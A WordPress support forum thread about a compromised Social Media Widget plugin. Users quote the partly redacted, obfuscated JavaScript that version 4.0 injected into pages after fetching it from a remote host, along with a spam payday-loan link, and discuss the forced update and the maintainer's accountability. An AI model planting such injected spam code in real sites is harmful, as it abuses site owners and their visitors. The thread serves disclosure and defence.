I think you posted a wrong link above. Try that. Which plugin out of the list there do you want to download?
Changelog of version 4.0.1 mentions removal of potentially malicious code.
I don’t know why 4.0.1 is not visible through /extend/plugins but trough /support/plugin, it is:
http://wordpress.org/support/plugin/social-media-widget
peter
(@dewebbouwmeester)
SMW 4.0 was infected. It retrieved the file contents of http://i.aaur.net/i.php which would inject the following into your pages, just after the widget:
<script type="text/javascript">
<!--//--><![CDATA[//><!--
function nemoViewState(){
var a=0,m,v,t,z,x=new
redacted
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
//--><!]]>
</script>
<p class="nemonn"><a href="http://paydaypam.co.uk/" title="Payday Loan">payday loans</a></p>
Nemo is also discussed here: http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html.
Version 4.0.1 of SMW does not retrieve http://i.aaur.net/i.php anymore and seems to be ok.
We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.
Like Otto states, i would not recommend using that plugin any time soon. Even if the version has been updated to address the issue, it’s a big concern that it even made it into the core of the plugin at all. This tells you that there is a serious access problem for that dev.
@krishna – that is the correct link. I was discussing a plugin that had been taken down, seeing a “We couldn’t find that plugin.” message is expected in this case.
Everyone else, thanks. When I grabbed the download using Google’s cache the version of the plugin I got was 3.3 (social-media-widget.3.3.zip). Were there any issues with that version?
I just checked and I do not see the code referenced in it, so it is probably ok, but I will alert my client that they should probably switch. Thanks. 🙂
-Michael
I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.7).
This post is to disassociate myself with this issue. I want the record to reflect that this issue arose months after I passed off the widget and have not had SVN access since signing over the widget in January. As the original creator of Social Media Widget and beginning its legacy, I want to remain clean of this in the case I decide to release a new WordPress plugin.
I had a discussion with the current maintainer whom I transferred the rights over to – It seems that one of the freelancers that he hired to do some updates decided to go rogue or his password was cracked, though you will have to hear it from him for the full story.
— Update – Changed the version I last pushed in the first paragraph
I just checked and I do not see the code referenced in it, so it is probably ok
No, in view of what Otto stated above, I feel that you should not use the plugin and find another one in its place.
Hi Brian,
I have a hard tibe believing what the current maintainer says. Several weeks ago, he was notified that something weird was going on in this thread: http://wordpress.org/support/topic/strange-url-in-social-widgetphp
Since then, he didn’t investigate? He didn’t clean up? The code just got replaced by code that was not that easy to spot.
Can’t you take ownership of the project again?
peter
(@dewebbouwmeester)
Version 3.3 contained the malware alteady – but with some different code, accessing [ redacted, really you do not have to share malware links here ]
You can get all version of the plugin from svn ( http://plugins.svn.wordpress.org/social-media-widget )
Version 4.0.1 is without the malicious code but like others say, best is obviously to remove this plugin plugin altogether.
We are working with the current maintainer of the plugin to ensure that everything is good, all problems are solved, all i’s dotted and all t’s crossed.
In the meantime, the plugin will remain in its current state until all the issues can be resolved with it. Speculation is unnecessary at this time. Okay? Everybody just pause until we sort it out, thanks. 🙂
@annoyingmouse – I can’t really comment on anything beyond what was said in my post. I only posted it to keep my name clean – not to speculate on the outcome.
I have every confidence in Otto and his team to get this issue resolved the way it has to be resolved.
The issue has been resolved and the plugin has been made available once again.
Otto, you forced an update onto sites to remove the malware from them? Without the admins clicking upgrade? How do you go about doing that?
Hi Otto
I’m having a very hard time with your latest insight.
What insight can you provide that will help reassure plugin users that this has in fact been resolved? Speaking of which, what exactly was resolved?
I have a hard time understanding how this is being allowed back in the repo, maybe you have all the answers you need, but allowing it back in the repo essentially tells people it’s good to go and you’re putting your name behind it as the approver. This is a pretty blatant abuse of trust by the author, and not much has been said from them on how it happened and how it has been adressed.
Tony
